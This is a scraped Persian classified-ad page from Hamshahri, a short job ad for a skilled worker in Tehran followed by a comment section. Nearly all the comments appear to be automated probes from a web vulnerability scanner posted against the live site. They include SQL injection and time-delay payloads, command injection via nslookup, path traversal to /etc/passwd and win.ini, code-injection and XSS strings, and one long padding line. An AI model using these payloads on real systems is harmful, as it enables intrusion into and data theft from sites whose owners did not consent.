تهران ، هفت تیر

کوپ کار ماهر نیازمندیم
آگهی دهنده نیازمندی های همشهری
کاربر نیازمندی ها از 49 سال پیش
هشدار : لطفا پیش از انجام معامله و هر نوع پرداخت وجه، از صحت کالا یا خدمات ارائه شده، به صورت حضوری اطمینان حاصل نمایید.
تلفن همراه: 09122....85

نظرات

ثبت نظر
asghar asghari

1

0
06/07 13:45
asghar asghari

-1 OR 2+155-155-1=0+0+0+1

0
06/09 04:33
asghar asghari

-1' OR 2+38-38-1=0+0+0+1 or 'oJHUentA'='

0
06/09 04:33
asghar asghari

-1" OR 2+23-23-1=0+0+0+1 --

0
06/09 04:33
asghar asghari

if(now()=sysdate(),sleep(6),0)

0
06/09 04:33
asghar asghari

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

0
06/09 04:33
asghar asghari

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

0
06/09 04:33
asghar asghari

-1); waitfor delay '0:0:2' --

0
06/09 04:33
asghar asghari

tq8H05r8'; waitfor delay '0:0:2' --

0
06/09 04:33
asghar asghari

-1);select pg_sleep(2); --

0
06/09 04:33
asghar asghari

-1));select pg_sleep(4); --

0
06/09 04:33
asghar asghari

cNQnqQIL';select pg_sleep(4); --

0
06/09 04:33
asghar asghari

BowqPpDW'));select pg_sleep(4); --

0
06/09 04:33
asghar asghari

set|set&set

0
06/09 04:33
asghar asghari

&nslookup rR84lfh8&'\"`0&nslookup rR84lfh8&`'

0
06/09 04:33
asghar asghari

../../../../../../../../../../etc/passwd

0
06/09 04:33
asghar asghari

../../../../../../../../../../../../../../../proc/version

0
06/09 04:33
asghar asghari

/../..//../..//../..//../..//../..//etc/passwd.jpg

0
06/09 04:33
asghar asghari

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

0
06/09 04:33
asghar asghari

/etc/passwd

0
06/09 04:33
asghar asghari

/.././.././.././.././.././.././.././../etc/./passwd

0
06/09 04:33
asghar asghari

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0
06/09 04:33
asghar asghari

file:///etc/passwd

0
06/09 04:33
asghar asghari

/WEB-INF/web.xml

0
06/09 04:33
asghar asghari

../../../../../../../../../../windows/win.ini.jpg

0
06/09 04:33
asghar asghari

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0
06/09 04:33
asghar asghari

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

0
06/09 04:33
asghar asghari

WEB-INF/web.xml

0
06/09 04:33
asghar asghari

WEB-INF\web.xml

0
06/09 04:33
asghar asghari

${10000124+9999164}

0
06/09 04:33
asghar asghari

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

0
06/09 04:33
asghar asghari

Http://testasp.vulnweb.com/t/fit.txt

0
06/09 04:33
asghar asghari

testasp.vulnweb.com

0
06/09 04:33
asghar asghari

!(()&&!|*|*|

0
06/09 04:33
asghar asghari

';print(md5(acunetix_wvs_security_test));$a='

0
06/09 04:33
asghar asghari

";print(md5(acunetix_wvs_security_test));$a="

0
06/09 04:33
asghar asghari

${@print(md5(acunetix_wvs_security_test))}

0
06/09 04:33
asghar asghari

${@print(md5(acunetix_wvs_security_test))}\

0
06/09 04:33
asghar asghari

HttP://testasp.vulnweb.com/t/xss.html?

0
06/09 04:33
asghar asghari

testasp.vulnweb.com/t/xss.html?

0
06/09 04:33
asghar asghari

5d62954e9dc6d67ecc2a7e89

0
06/09 04:33
asghar asghari

5d62954e9dc6d67ecc2a7e89

0
06/09 04:33
asghar asghari

@@f8He9

0
06/09 04:33
asghar asghari

''""

0
06/09 04:33
asghar asghari

1'"()&%[removed]hbfs(9596)[removed]

0
06/09 04:33
asghar asghari

'"()&%[removed]hbfs(9922)[removed]

0
06/09 04:33

در صورتی که در فرایند کار نیاز به راهنمایی و یا رفع مشکل دارید، می توانید در تمام طول شبانه روز با تلفن 021 1819 تماس حاصل فرمائید.

نیازمندی های راهنمای همشهری اولین رسانه نیازمندی ها در ایران

سازمان نیازمندیهای همشهري جهت پاسخگويي به نيازها و انتظارات مردم در بخش نيازمنديهاي شهري در ابتداي سال 1373 تاسيس و با انتشار راهنماي همشهري فعاليت رسانه اي خود را رسما آغاز كرد. هدف و ماموريت نیازمندیهای همشهري برقراري ارتباط بي واسطه ميان خريداران و فروشندگان كالا و خدمات تمامي ايرانيان است.

ما را دنبال کنید :

استفاده از مطالب این سایت فقط برای مقاصد غیرتجاری و با ذکر منبع بلامانع است، کلیه حقوق این سایت متعلق به موسسه همشهری می باشد